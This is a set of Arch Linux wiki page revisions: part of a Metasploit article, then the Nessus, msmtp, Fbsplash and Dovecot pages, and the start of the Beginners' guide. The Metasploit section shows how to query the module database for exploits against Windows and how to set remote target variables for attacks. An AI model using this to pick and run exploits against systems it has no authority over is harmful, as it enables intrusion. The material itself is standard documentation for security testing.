The information about modules is stored in 8 tables:<br />
<br />
{| class="wikitable"<br />
!Table Name<br />
!Contents<br />
|-<br />
|{{ic|module_details}}<br />
|The "main" table, describes various details of each module<br />
|-<br />
|{{ic|module_actions}}<br />
|The action names of ''auxiliary'' modules<br />
|-<br />
|{{ic|module_archs}}<br />
|The target hardware architecture or software platform<br />
|-<br />
|{{ic|module_authors}}<br />
|Names and emails of module author<br />
|-<br />
|{{ic|module_mixins}}<br />
|Empty (???)<br />
|-<br />
|{{ic|module_platforms}}<br />
|The target operating system. See also [[#Popularity of a platform by number of exploits]]<br />
|-<br />
|{{ic|module_refs}}<br />
|References to various online exploit databases and reports <br />
|-<br />
|{{ic|module_targets}}<br />
|The target program name and version of the ''exploit''<br />
|}<br />
<br />
{{Tip|To see what type of details (columns) a table contains, run {{ic|\d+ ''table_name''}}. For example: {{ic|\d+ module_details}}.}}<br />
<br />
Almost all tables have 3 columns: {{ic|id}}, {{ic|detail_id}} and {{ic|name}}, except for {{ic|module_details}} table which has 16 columns.<br />
<br />
The {{ic|detail_id}} values are pointers to the rows of {{ic|module_details}} table.<br />
<br />
To see the all the contents of a table, run:<br />
<br />
SELECT * FROM ''table_name'';<br />
<br />
Multiple:<br />
<br />
* Architecture<br />
* Platform<br />
* Target<br />
<br />
Module options:<br />
<br />
* module type<br />
* stance<br />
* privileged<br />
* path<br />
* name<br />
* refname<br />
* rank<br />
* privileged<br />
* disclosure date<br />
<br />
=== Database search examples ===<br />
<br />
The {{ic|module_details}} table contains multiple columns and viewing them all at once is not convenient. To show only basic information about the modules:<br />
<br />
SELECT id, mtype, refname, disclosure_date, rank, stance, name<br />
FROM module_details;<br />
<br />
Show some information about available modules, include platform information from {{ic|module_platforms}}:<br />
<br />
SELECT module_details.id, mtype, module_platforms.name as platform, refname, DATE(disclosure_date), rank, module_details.name<br />
FROM module_details JOIN module_platforms ON module_details.id = module_platforms.detail_id;<br />
<br />
Show all client (aggressive) exploits for Windows platform:<br />
<br />
SELECT module_details.id, mtype, module_platforms.name as platform, refname, DATE(disclosure_date), rank, module_details.name<br />
FROM module_details JOIN module_platforms ON module_details.id = module_platforms.detail_id<br />
WHERE module_platforms.name = 'windows'<br />
AND mtype = 'exploit'<br />
AND stance = 'aggressive';<br />
<br />
Show all exploits for Windows platform with rank >= 500 disclosed after 2013:<br />
<br />
SELECT module_details.id, mtype, module_platforms.name as platform, refname, DATE(disclosure_date), rank, module_details.name<br />
FROM module_details JOIN module_platforms ON module_details.id = module_platforms.detail_id<br />
WHERE module_platforms.name = 'windows'<br />
AND mtype = 'exploit'<br />
AND rank >= 500<br />
AND disclosure_date >= TIMESTAMP '2013-1-1';<br />
<br />
Show all aggressive (client) exploits for Windows platform with rank >= 500 and include additional information about module's target:<br />
<br />
SELECT module_details.id, mtype, module_platforms.name as platform, module_details.name, DATE(disclosure_date), rank, module_targets.name as target<br />
FROM module_details JOIN module_platforms ON module_details.id = module_platforms.detail_id JOIN module_targets on module_details.id = module_targets.detail_id<br />
WHERE module_platforms.name = 'windows'<br />
AND mtype = 'exploit'<br />
AND stance = 'aggressive'<br />
AND rank >= 500<br />
order by target;<br />
<br />
=== Popularity of a platform by number of exploits ===<br />
<br />
To view the possible {{ic|platform}} values, and number of available exploits, run from {{ic|psql}}:<br />
<br />
SELECT name, count(*)<br />
FROM module_platforms<br />
GROUP BY name<br />
ORDER BY count DESC;<br />
<br />
=== Disable the ASCII banner on startup ===<br />
<br />
To disable the banner, run {{ic|msfconsole}} with {{ic|-q}}/{{ic|--quiet}} argument:<br />
<br />
$ msfconsole --quiet<br />
<br />
=== Preserve variable values between sessions ===<br />
<br />
If you do not want the variables to reset when selecting another module and when rerunning {{ic|msfconsole}} then set it globally via {{ic|setg}}, for example:<br />
<br />
msf > setg RHOST 192.168.56.102<br />
<br />
== Troubleshooting ==<br />
<br />
=== Cannot click in VNC viewer ===<br />
<br />
If you selected VNC viewer as a payload, but are unable to click or do any actions, that means you forgot to set the {{ic|ViewOnly}} variable to false. To fix this problem, re-run the exploit with the variable set to {{ic|false}}:<br />
<br />
msf > set ViewOnly false<br />
<br />
=== cannot load such file -- robots (LoadError) ===<br />
<br />
If you get an error like this:<br />
<br />
~/metasploit-framework/lib/metasploit/framework.rb:19:in `require': cannot load such file -- robots (LoadError)<br />
from ~/metasploit-framework/lib/metasploit/framework.rb:19:in `<top (required)>'<br />
from ~/metasploit-framework/lib/metasploit/framework/database.rb:1:in `require'<br />
from ~/metasploit-framework/lib/metasploit/framework/database.rb:1:in `<top (required)>'<br />
from ~/metasploit-framework/lib/metasploit/framework/parsed_options/base.rb:17:in `require'<br />
from ~/metasploit-framework/lib/metasploit/framework/parsed_options/base.rb:17:in `<top (required)>'<br />
from ~/metasploit-framework/lib/metasploit/framework/parsed_options/console.rb:2:in `<top (required)>'<br />
from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/inflector/methods.rb:230:in `const_get'<br />
from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/inflector/methods.rb:230:in `block in constantize'<br />
from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/inflector/methods.rb:229:in `each'<br />
from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/inflector/methods.rb:229:in `constantize'<br />
from /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/activesupport-3.2.19/lib/active_support/core_ext/string/inflections.rb:54:in `constantize'<br />
from ~/metasploit-framework/lib/metasploit/framework/command/base.rb:73:in `parsed_options_class'<br />
from ~/metasploit-framework/lib/metasploit/framework/command/base.rb:69:in `parsed_options'<br />
from ~/metasploit-framework/lib/metasploit/framework/command/base.rb:47:in `require_environment!'<br />
from ~/metasploit-framework/lib/metasploit/framework/command/base.rb:81:in `start'<br />
from ./msfconsole:48:in `<main>'<br />
<br />
This happens because the file {{ic|robots.rb}} has incorrect permissions and can be read only by the root user (see [https://github.com/fizx/robots/issues/6 the bug report]):<br />
<br />
{{hc|$ ls -l /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/robots-0.10.1/lib|<br />
total 4<br />
-rw-r----- 1 root root 3174 Oct 19 16:47 robots.rb<br />
}}<br />
<br />
To fix this, simply change the permission to be world-readable:<br />
<br />
# chmod o+r /opt/ruby1.9/lib/ruby/gems/1.9.1/gems/robots-0.10.1/lib/robots.rb<br />
<br />
=== db_connect fails silently ===<br />
<br />
If upon running {{ic|db_connect}} you see no output, but later getting a message like this:<br />
<br />
[!] Database not connected or cache not built, using slow search<br />
<br />
that probably means that the {{ic|postgresql}} service is not running.<br />
<br />
== See also ==<br />
<br />
* [http://www.offensive-security.com/metasploit-unleashed/Main_Page Metasploit Unleashed security training]<br />
* [https://github.com/rapid7/metasploit-framework/wiki Metasploit wiki on GitHub]<br />
* [http://en.wikibooks.org/wiki/Metasploit The Metasploit Book]</div>Jakkinhttps://wiki.archlinux.org/index.php?title=Nessus&diff=435099Nessus2016-05-15T18:55:23Z<p>Jakkin: The user is no longer required to download the Nessus rpm, thanks to a script included in the PKGBUILD. The information in the wiki became outdated and has been updated accordingly.</p>
<hr />
<div>[[Category:Networking]]<br />
[[Category:Security]]<br />
[[ja:Nessus]]<br />
[[ru:Nessus]]<br />
[[Wikipedia:Nessus (software)|Nessus]] is a proprietary [[Wikipedia:Vulnerability scanner|vulnerability scanner]] available free of charge for personal use. There are [http://www.tenable.com/plugins/ over 40,000 plugins] covering a large range of both local and remote flaws.<br />
<br />
== Installation ==<br />
<br />
Download and extract the {{AUR|nessus}} tarball available in the [[AUR]].<br />
<br />
{{Note|As of April 26, 2016, it is no longer required to agree and download the Nessus rpm. A script will run and download the rpm from the Nessus site automatically. If it appears that nothing is happening, please be patient as the script runs wget silently. The installation will proceed after the rpm is downloaded.}}<br />
<br />
== Post-installation setup ==<br />
<br />
Register your email at http://www.tenable.com/products/nessus/nessus-plugins/obtain-an-activation-code and wait for your key to be emailed to you. <br />
<br />
== Usage ==<br />
<br />
The {{AUR|nessus}} package provides a {{ic|nessusd.service}} unit file, see [[systemd#Using units]] for details.<br />
<br />
Access the web interface at https://localhost:8834 and/or use the commandline interface ({{ic|/opt/nessus/sbin/nessuscli}}). In most browsers, you will need to manually accept the SSL certificate you created for the server.<br />
<br />
== Removal ==<br />
<br />
The package can be removed with [[pacman#Removing packages|pacman]], but files created by Nessus, such as the plugin database it downloads, must be removed manually:<br />
<br />
{{Note|This will delete your Nessus configuration files.}}<br />
<br />
# rm -r /opt/nessus<br />
<br />
== See also ==<br />
<br />
* [http://www.tenable.com/products/nessus/documentation The multilanguage official documentation]</div>Jakkinhttps://wiki.archlinux.org/index.php?title=Msmtp&diff=416206Msmtp2016-01-19T17:57:01Z<p>Jakkin: added a comma to follow grammar rules</p>
<hr />
<div>{{Lowercase title}}<br />
[[Category:Email clients]]<br />
[[Category:Mail server]]<br />
[[ja:Msmtp]]<br />
{{Related articles start}}<br />
{{Related|mutt}}<br />
{{Related|OfflineIMAP}}<br />
{{Related articles end}}<br />
<br />
[http://msmtp.sourceforge.net/ msmtp] is a very simple and easy to use SMTP client with fairly complete [[Wikipedia:sendmail|sendmail]] compatibility.<br />
<br />
== Installing ==<br />
<br />
msmtp can be [[installed]] with the package {{Pkg|msmtp}}. Additionally install {{Pkg|msmtp-mta}} that creates a sendmail alias to msmtp.<br />
<br />
== Basic setup ==<br />
<br />
The following is an example of a msmtp configuration (the file is based on the packaged, regular-user, example located at {{ic|/usr/share/doc/msmtp/msmtprc-user.example}}; the system configuration file belongs at {{ic|/etc/msmtprc}} and it's example is located at {{ic|/usr/share/doc/msmtp/msmtprc-system.example}}):<br />
<br />
{{hc|~/.msmtprc|<br />
# Set default values for all following accounts.<br />
defaults<br />
auth on<br />
tls on<br />
tls_trust_file /etc/ssl/certs/ca-certificates.crt<br />
logfile ~/.msmtp.log<br />
<br />
# Gmail<br />
account gmail<br />
host smtp.gmail.com<br />
port 587<br />
from ''username''@gmail.com<br />
user ''username''<br />
password ''plain-text-password''<br />
<br />
# A freemail service<br />
account freemail<br />
host smtp.freemail.example<br />
from joe_smith@freemail.example<br />
...<br />
<br />
# Set a default account<br />
account default : gmail<br />
}}<br />
<br />
{{Note|If you are using SSL/TLS and receive a "Server sent empty reply" error message, see [[#Server sent empty reply]].}}<br />
<br />
The ''user'' configuration file must be explicitly readable/writeable to only it's owner or msmtp will fail:<br />
<br />
$ chmod 600 ~/.msmtprc<br />
<br />
To avoid saving the password in plain text in the configuration file, use ''passwordeval'' to launch an external program. This example using Gnu PG is commonly used to perform decryption of a password:<br />
<br />
echo -e "password\n" | gpg --encrypt -o .msmtp-gmail.gpg # enter id (email...)<br />
<br />
{{Warning |Most shells save command history(e.g. .bash_history .zhistory). To avoid this, use gpg with shell stdin:<br />
<code>gpg --encrypt -o .msmtp-gmail.gpg -r <email> -</code>. The ending dash is not a typo, rather it causes gpg to use stdin. After running that snippet of code, type in your password, press enter, and press Control-d so gpg can encrypt your password.}}<br />
<br />
{{hc|~/.msmtprc|<br />
passwordeval "gpg --quiet --for-your-eyes-only --no-tty --decrypt ~/.msmtp-gmail.gpg"<br />
}}<br />
<br />
== Using the mail command ==<br />
<br />
To send mails using the {{ic|mail}} command you must install the package {{Pkg|s-nail}}. Either install {{Pkg|msmtp-mta}} or edit {{ic|/etc/mail.rc}} to set sendmail client:<br />
<br />
{{hc|/etc/mail.rc|2=set sendmail=/usr/bin/msmtp}}<br />
<br />
A {{ic|.msmtprc}} file will need to be in the home of every user who want to send mail or alternatively the system wide {{ic|/etc/msmtprc}} can be used.<br />
<br />
msmtp also understands aliases. Add the following line to the defaults section of msmtprc or your local configuration file:<br />
<br />
{{hc|/etc/msmtprc|2=aliases /etc/aliases}}<br />
<br />
and create an aliases file in {{ic|/etc}}<br />
<br />
{{hc|/etc/aliases|2=# Example aliases file<br />
<br />
# Send root to Joe and Jane<br />
root: joe_smith@example.com, jane_chang@example.com<br />
<br />
# Send everything else to admin<br />
default: admin@domain.example}}<br />
<br />
== Test functionality ==<br />
<br />
The account option ({{ic|1=--account=,-a}} tells which account to use as sender:<br />
<br />
$ echo "hello there username." | msmtp -a default ''username''@domain.com<br />
<br />
Or, with the addresses in a file:<br />
<br />
To: ''username''@domain.com<br />
From: ''username''@gmail.com<br />
Subject: A test<br />
<br />
Hello there.<br />
<br />
$ cat test.mail | msmtp -a default <username>@domain.com<br />
<br />
{{Tip|If using Gmail you'll need to allow "Less Secure Apps" in ''Settings'' > ''Security''. Make sure to sign out of your other Gmail accounts first because the security settings part of Google Accounts can not manage concurrent sessions of more than one account.}}<br />
<br />
== Cronie default email client ==<br />
<br />
{{Out of date|Arch uses [[systemd/Timers]] instead of cronie}}<br />
<br />
To make {{Pkg|cronie}} use msmtp rather than sendmail, make sure {{Pkg|msmtp-mta}} is installed, or edit the {{ic|cronie.service}} systemd unit:<br />
<br />
{{hc|/etc/systemd/system/cronie.service.d/msmtp.conf|[Service]<br />
ExecStart&#61;<br />
ExecStart&#61;/usr/bin/crond -n -m '/usr/bin/msmtp -t'}}<br />
<br />
Then you must tell cronie or msmtp what your email address is, either by:<br />
<br />
# Add to {{ic|/etc/msmtprc}}: {{bc|aliases /etc/aliases}} and create {{ic|/etc/aliases}}: {{bc|your_username: email@address.com}}&mdash; OR &mdash;.<br />
* Add a {{ic|MAILTO}} line to the crontab: {{bc|MAILTO&#61;email@address.com}}<br />
<br />
== Miscellaneous ==<br />
<br />
Other details.<br />
<br />
=== Practical password management ===<br />
<br />
The {{Ic|password}} directive may be omitted. In that case, if the account in question has {{Ic|auth}} set to a legitimate value other than {{Ic|off}}, invoking msmtp from an interactive shell will ask for the password before sending mail. msmtp will not prompt if it has been called by another type of application, such as [[Mutt]].<br />
There is a solution for such cases: the {{ic|--passwordeval}} parameter.<br />
You can call msmtp to use an external keyring tool like gpg:<br />
{{bc|msmtp --passwordeval 'gpg -d mypwfile.gpg'}}<br />
If gpg prompt for the passphrase cannot be issued (e.g. when called from Mutt) then start the [[GPG#gpg-agent|gpg-agent]] before.<br />
<br />
A simple hack to start the agent is to execute a external command in your muttrc.<br />
{{Note| Mutt uses the backtick {{ic| ` command ` }} syntax to execute external commands}}<br />
<br />
For example, you can put something like the following in your muttrc<br />
<br />
{{hc|muttrc|set my_msmtp_pass&#61;`gpg -d mypwfile.gpg`}}<br />
<br />
Mutt will execute this when it starts, gpg-agent will cache your password, msmtp will be happy and you can send mail. <br />
{{Note| If you do this, you will have to restart mutt after gpg-agent clears the password to start sending emails again}}<br />
<br />
If you cannot use a keyring tool for any reason, you may want to use the password directly. There is a patched version {{AUR|msmtp-pwpatched}}{{Broken package link|{{aur-mirror|msmtp-pwpatched}}}} in the AUR that provides the {{ic|--password}} parameter. Note that it is a '''huge security flaw''', since any user connected to you machine can see the parameter of any command (in the /proc filesystem for example).<br />
<br />
If this is not desired, an alternative is to place passwords in {{ic|~/.netrc}}, a file that can act as a common pool for msmtp, [[OfflineIMAP]], and associated tools.<br />
<br />
===Using msmtp offline===<br />
<br />
Although msmtp is great, it requires that you be online to use it. This isn't ideal for people on laptops with intermittent connections to the Internet or dialup users. Several scripts have been written to remedy this fact, collectively called msmtpqueue.<br />
<br />
The scripts are installed under {{ic|/usr/share/doc/msmtp/msmtpqueue}}. You might want to copy the scripts to a convenient location on your computer, ({{ic|/usr/local/bin}} is a good choice).<br />
<br />
Finally, change your MUA to use msmtp-enqueue.sh instead of msmtp when sending e-mail. By default, queued messages will be stored in {{ic|~/.msmtpqueue}}. To change this location, change the {{ic|QUEUEDIR&#61;$HOME/.msmtpqueue}} line in the scripts (or delete the line, and export the QUEUEDIR variable in {{ic|.bash_profile}} like so: {{ic|export QUEUEDIR&#61;"$XDG_DATA_HOME/msmtpqueue"}}). <br />
<br />
When you want to send any mail that you've created and queued up run:<br />
$ /usr/local/bin/msmtp-runqueue.sh<br />
<br />
Adding {{ic|/usr/local/bin}} to your PATH can save you some keystrokes if you're doing it manually. The README file that comes with the scripts has some handy information, reading it is recommended.<br />
<br />
===Vim syntax highlighting===<br />
The msmtp source distribution includes a {{ic|msmtprc}} highlighting script for [[Vim]]. Install it from {{ic|./scripts/vim/msmtp.vim}}.<br />
<br />
===Send mail with PHP using msmtp===<br />
Look for ''sendmail_path'' option in your {{ic|php.ini}} and edit like this:<br />
{{bc|1=<br />
sendmail_path = "/usr/bin/msmtp -C /path/to/your/config -t"<br />
}}<br />
<br />
Note that you '''can not''' use a user configuration file (ie: one under ~/) if you plan on using msmtp as a sendmail replacement with php or something similar.<br />
In that case just create /etc/msmtprc, and remove your user configuration (or not if you plan on using it for something else). Also make sure it's readable by whatever you're using it with (php, django, etc...)<br />
<br />
From the msmtp manual: ''Accounts defined in the user configuration file override accounts from the system configuration file. The user configuration file must have no more permissions than user read/write''<br />
<br />
So it's impossible to have a conf file under ~/ and have it still be readable by the php user.<br />
<br />
To test it place this file in your php enabled server or using php-cli.<br />
{{bc|<br />
<?php<br />
mail("your@email.com", "Test email from PHP", "msmtp as sendmail for PHP");<br />
?><br />
}}<br />
<br />
==Troubleshooting==<br />
===Issues with TLS===<br />
If you see the following message:<br />
msmtp: TLS certificate verification failed: the certificate hasn't got a known issuer<br />
it probably means your tls_trust_file is not right.<br />
<br />
Just follow the [http://msmtp.sourceforge.net/doc/msmtp.html#Transport-Layer-Security fine manual]. It explains you how to find out the server certificate issuer of a given smtp server. Then you can explore the {{ic|/usr/share/ca-certificates/}} directory to find out if by any chance, the certificate you need is there. If not, you will have to get the certificate on your own. If you are using your own certificate, you can make msmtp trust it by adding the following to your '''~/.msmtprc''':<br />
<br />
tls_fingerprint <SHA1 (recommended) or MD5 fingerprint of the certificate><br />
<br />
If you are trying to send mail through GMail and are receiving this error, have a look at [http://www.mail-archive.com/msmtp-users@lists.sourceforge.net/msg00141.html this] thread or just use the second GMail example above.<br />
<br />
If you are completely desperate, but are 100% sure you are communicating with the right server, you can always temporarily disable the cert check:<br />
$ msmtp --tls-certcheck off<br />
<br />
If you see the following message:<br />
msmtp: TLS handshake failed: the operation timed out<br />
You may be affected by this [https://bugs.archlinux.org/task/44994 bug]. Recompile with "--with-ssl=openssl" (msmtp is compiled with GnuTLS by default).<br />
<br />
===Server sent empty reply===<br />
If you get a "server sent empty reply" error, add the following line to '''~/.msmtprc''':<br />
<br />
tls_starttls off<br />
<br />
This allows msmtp to use SSL/TLS (port 465) in place of STARTTLS (port 587) [https://www.fastmail.com/help/technical/ssltlsstarttls.html].<br />
<br />
===Issues with GSSAPI===<br />
<br />
If you get the following error<br />
<br />
GNU SASL: GSSAPI error in client while negotiating security context in gss_init_sec_context() in SASL library. This is most likely due insufficient credentials or malicious interactions.<br />
<br />
Try changing your auth setting to plain, instead of gssapi in your .msmtprc file [https://bbs.archlinux.org/viewtopic.php?id=138727]:<br />
<br />
auth plain</div>Jakkinhttps://wiki.archlinux.org/index.php?title=Fbsplash&diff=367943Fbsplash2015-03-30T21:18:16Z<p>Jakkin: Minor spelling fix</p>
<hr />
<div>{{Out of date|using initscripts}}<br />
[[Category:Bootsplash]]<br />
[[de:Fbsplash]]<br />
[[es:Fbsplash]]<br />
[[fr:Fbsplash]]<br />
[[it:Fbsplash]]<br />
[[ru:Fbsplash]]<br />
[[tr:Fbsplash]]<br />
[[zh-CN:Fbsplash]]<br />
[http://sourceforge.net/projects/fbsplash.berlios/ Fbsplash] (formerly gensplash) is a userspace implementation of a splash screen for Linux systems. It provides a graphical environment during system boot using the Linux framebuffer layer.<br />
Fbsplash has not been actively updated in the recent years and may not be working correctly on a recent Arch setup using [[systemd]]. If you want a fancy splash screen during boot, you might want to try [[Plymouth]] instead.<br />
<br />
==Installation==<br />
===Fbsplash===<br />
The {{AUR|fbsplash}} package is available in the [[AUR]]. For console backgrounds (discussed later in this article) you should install a kernel patched with fbcondecor such as {{AUR|linux-fbcondecor}}.<br />
<br />
===Scripts===<br />
The fbsplash package provides the scripts for basic functionality. If you want more bells and whistles, like smooth progress, filesystem-check progress messages, support for boot-services/'daemons'-icons and theme hook scripts, you may also install the {{AUR|fbsplash-extras}} package.<br />
<br />
===Themes===<br />
Themes can be found by searching the AUR for [https://aur.archlinux.org/packages.php?O=0&K=fbsplash-theme&do_Search=Go fbsplash-theme], in [http://gnome-look.org GNOME-Look.org] or in [http://kde-look.org KDE-Look.org].<br />
{{Note|The package fbsplash does not contain a default theme.}}<br />
<br />
===Suspend to Disk===<br />
If you want suspend to disk with [[Uswsusp]] using Fbsplash, install the {{AUR|uswsusp-fbsplash}} package from the AUR. Additionally there is limited support for using Fbsplash in the {{AUR|tuxonice-userui}} package for those using a kernel with the [[TuxOnIce]] patch.<br />
<br />
==Configuration==<br />
<br />
===Kernel Command Line===<br />
<br />
You now need to set something like {{ic|1=quiet loglevel=3 logo.nologo gfxpayload=keep console=tty1 splash=silent,fadein,fadeout,theme:arch-banner-icons}} as your kernel command line parameters in your bootloader. See [[Kernel parameters]] for more info.<br />
<br />
The parameter {{Ic|1=loglevel=3}} prevents kernel messages from garbling the splash even with funny hardware (as recent initscripts do not set this by default any more). {{Ic|quiet}} is needed additionally for silencing initcpio messages. {{Ic|logo.nologo}} removes the boot logo (not needed with [https://aur.archlinux.org/packages.php?ID=50924 linux-fbcondecor] since it does not have one anyway). {{Ic|1=console=tty1}} redirects system messages to tty1 and {{Ic|1=splash=silent,fadein,fadeout,theme:arch-banner-icons}} creates a silent, splash-only boot with fading in/out ''arch-banner-icons'' theme.<br />
<br />
===Configuration Files===<br />
Put one or more of the themes you installed into {{ic|/etc/conf.d/splash}}. You can also specify screen resolutions to save some initcpio space:<br />
{{hc|/etc/conf.d/splash|2=SPLASH_THEMES="<br />
arch-black<br />
arch-banner-icons/1280x1024.cfg<br />
arch-banner-noicons/1280x1024.cfg"}}<br />
{{Note|The theme '''arch-banner-icons''' contains mainly symlinks to '''arch-banner-noicons'''. So if one of them is included in total, not much space will be saved by limiting the resolutions.}}<br />
<br />
==Starting Fbsplash early in the initcpio==<br />
If '''uresume''' and/or '''encrypt''' HOOKS are used, add '''fbsplash''' ''after'' them in {{ic|/etc/[[mkinitcpio.conf]]}}, e.g.:<br />
{{hc|/etc/mkinitcpio.conf|2=HOOKS="base udev autodetect [...] keymap encrypt uresume fbsplash" }}<br />
Rebuild your initcpio via mkinitcpio. See the [[Mkinitcpio#Creating_the_image|Mkinitcpio article]] for more info.<br />
<br />
{{Tip|For a quick resume, it is recommended to put '''uswsusp''' ''before'' '''fbsplash''' or even drop {{ic|fadein}}, if using a Fbcondecor kernel.}}<br />
<br />
If you have trouble getting fbsplash to work and your machine uses KMS (Kernel Mode Setting), try [[Intel#KMS_.28Kernel_Mode_Setting.29|adding the appropriate driver to mkinitcpio.conf]].<br />
<br />
==Console backgrounds==<br />
<br />
If you have a kernel that supports Fbcondecor (eg. {{AUR|linux-fbcondecor}}), you can get nice graphical console backgrounds beside the splash screen.<br />
<br />
Currently(2015) the {{AUR|fbsplash}} package provides a deprecated daemon script to set up console backgrounds. However, the programs that actually handle console backgrounds are still working fine! Just look for /usr/bin/splash_manager or /usr/bin/fbcondecor_ctl and set up console backgrounds manually, or use them as a basis to [[Systemd#Writing_unit_files|write]] your own systemd unit.<br />
<br />
Even if you have no interest in a splash screen, you will still need splash themes for your console background. Either get an existing one from the AUR [https://aur.archlinux.org/packages.php?O=0&K=fbsplash-theme&do_Search=Go fbsplash-theme] or create one yourself in {{ic|/etc/splash/}}. The only parameter in the theme .cfg file needed to enable console backgrounds is {{ic|pic}}.<br />
<br />
You may even boot up with a nice console background and the plain Arch Linux boot messages instead of a splash screen. Just change your kernel command line to use the verbose mode:<br />
quiet console=tty1 splash=verbose,theme:arch-banner-icons<br />
<br />
==Links==<br />
* http://fbsplash.alanhaggai.org {{Dead link|2014|05|01}}<br />
* http://dev.gentoo.org/~spock/projects/fbcondecor/ {{Dead link|2014|05|01}}<br />
* http://www.mepiscommunity.org/fbcondecor</div>Jakkinhttps://wiki.archlinux.org/index.php?title=Dovecot&diff=363938Dovecot2015-03-04T20:37:22Z<p>Jakkin: </p>
<hr />
<div>[[Category:Mail Server]]<br />
[[ja:Dovecot]]<br />
{{Related articles start}}<br />
{{Related|Postfix}}<br />
{{Related|Courier MTA}}<br />
{{Related|OpenSMTPD}}<br />
{{Related|Fail2ban}}<br />
{{Related|Virtual_user_mail_system}}<br />
{{Related articles end}}<br />
This article describes how to set up a mail server suitable for personal or small office use.<br />
<br />
[http://www.dovecot.org/ Dovecot] is an open source [[Wikipedia:IMAP|IMAP]] and [[Wikipedia:POP3|POP3]] server for Linux/UNIX-like systems, written primarily with security in mind. Developed by Timo Sirainen, Dovecot was first released in July 2002. Dovecot primarily aims to be a lightweight, fast and easy to set up open source mailserver. For more detailed information, please see the official [http://wiki2.dovecot.org/ Dovecot Wiki].<br />
<br />
==Installation==<br />
<br />
[[pacman|Install]] the packages {{Pkg|dovecot}} and {{Pkg|pam}} from the [[official repositories]].<br />
<br />
==Configuration==<br />
<br />
===Assumptions===<br />
<br />
* Each mail account served by Dovecot, has a local user account defined on the server.<br />
* The server uses [[Wikipedia:Pluggable authentication module|PAM]] to authenticate the user against the local user database (/etc/passwd).<br />
* [[Wikipedia:Transport_Layer_Security|SSL]] is used to encrypt the authentication password.<br />
* The common [[Wikipedia:Maildir|Maildir]] format is used to store the mail in the user's home directory.<br />
* A [[Wikipedia:Mail delivery agent|MDA]] has already been set up to deliver mail to the local users.<br />
<br />
===Create the SSL certificate===<br />
<br />
The {{Pkg|dovecot}} package contains a script to generate the server SSL certificate.<br />
<br />
* Copy the configuration file from the sample file: {{ic|# cp /etc/ssl/dovecot-openssl.cnf{.sample,} }}.<br />
* Edit {{ic|/etc/ssl/dovecot-openssl.cnf}} to configure the certificate.<br />
<br />
* Execute {{ic|# /usr/lib/dovecot/mkcert.sh}} to generate the certificate.<br />
<br />
The certificate/key pair is created as {{ic|/etc/ssl/certs/dovecot.pem}} and {{ic|/etc/ssl/private/dovecot.pem}}.<br />
<br />
Run {{ic|mv /etc/ssl/certs/dovecot.pem /etc/ca-certificates/trust-source/anchors/dovecot.crt}} and then {{ic|# trust extract-compat}} whenever you have<br />
changed your certificate.<br />
<br />
===PAM Authentication===<br />
<br />
* To configure PAM for dovecot, create {{ic|/etc/pam.d/dovecot}} with the following content:<br />
{{hc|/etc/pam.d/dovecot|<br />
auth required pam_unix.so nullok<br />
account required pam_unix.so <br />
}}<br />
<br />
===Dovecot configuration===<br />
<br />
* Copy the dovecot.conf and conf.d/* configuration files from {{ic|/usr/share/doc/dovecot/example-config}} to {{ic|/etc/dovecot}}:<br />
{{bc|<br />
# cp /usr/share/doc/dovecot/example-config/dovecot.conf /etc/dovecot<br />
# cp -r /usr/share/doc/dovecot/example-config/conf.d /etc/dovecot<br />
}}<br />
<br />
The default configuration is ok for most systems, but make sure to read through the configuration files to see what options are available. See the [http://wiki2.dovecot.org/QuickConfiguration quick configuration guide] and [http://wiki2.dovecot.org/#Dovecot_configuration dovecot configuration] for more instructions.<br />
<br />
By default dovecot will try to detect what mail storage system is in use on the system. To use the Maildir format edit {{ic|/etc/dovecot/conf.d/10-mail.conf}} to set {{ic|1=mail_location = maildir:~/Maildir}}.<br />
<br />
===Sieve===<br />
<br />
[http://en.wikipedia.org/wiki/Sieve_%28mail_filtering_language%29 Sieve] is a programming language that can be used to create filters for email on mail server.<br />
<br />
* Install pigeonhole<br />
* Add "sieve" to "protocols" in dovecot.conf (and the lines from the next points)<br />
<pre><br />
protocols = imap pop3 sieve<br />
</pre><br />
* Add minimal 80-sieve.conf in {{ic|/etc/dovecot/conf.d/}}<br />
<pre><br />
service managesieve-login {<br />
inet_listener sieve {<br />
port = 4190<br />
}<br />
}<br />
<br />
service managesieve {<br />
}<br />
<br />
protocol sieve {<br />
}<br />
</pre><br />
* Add "sieve" to "mail_plugins" in "protocol lda" section<br />
<pre><br />
protocol lda {<br />
mail_plugins = sieve<br />
}<br />
</pre><br />
* Specify sieve storage location in "plugin" section:<br />
<pre><br />
plugin {<br />
sieve=/var/mail/%u/dovecot.sieve<br />
sieve_dir=/var/mail/%u/sieve<br />
}<br />
</pre><br />
<br />
{{Note| Nowadays it is recommended to use LMTP instead of LDA. Nevertheless the Dovecot LDA can still be used for small mailservers. More information can be found in the [http://wiki2.dovecot.org/LMTP Dovecot Wiki]}}<br />
<br />
* Ensure that your MTA uses dovecot for delivery. For example: postfix's main.cf and dovecot-lda:<br />
mailbox_command = /usr/lib/dovecot/dovecot-lda -f "$SENDER" -a "$RECIPIENT"<br />
<br />
==Starting the server==<br />
<br />
Use the standard [[systemd]] syntax to control the {{ic|dovecot.service}} [[daemon]].<br />
# systemctl start dovecot.service<br />
<br />
To have it start on boot<br />
# systemctl enable dovecot.service<br />
<br />
== Tricks ==<br />
<br />
Generate hashes with non-default hash functions.<br />
<br />
doveadm pw -s SHA512-CRYPT -p "superpassword"<br />
<br />
Remember to make sure that the column in the database is large enough(you might not get a warning..)<br />
<br />
Remember to set the password scheme in your dovecot-sql.conf file<br />
<br />
default_pass_scheme = SHA512-CRYPT</div>Jakkinhttps://wiki.archlinux.org/index.php?title=Beginners%27_guide&diff=362718Beginners' guide2015-02-26T06:57:50Z<p>Jakkin: Changed "pacstrap -i /mnt base base-devel" line into two lines clarifying the reason base-devel was needed.</p>
<hr />
<div>[[Category:Getting and installing Arch]]<br />
[[ar:Beginners' Guide]]<br />
[[bg:Beginners' Guide]]<br />
[[cs:Beginners' Guide]]<br />
[[da:Beginners' Guide]]<br />
[[de:Anleitung für Einsteiger]]<br />
[[el:Beginners' Guide]]<br />
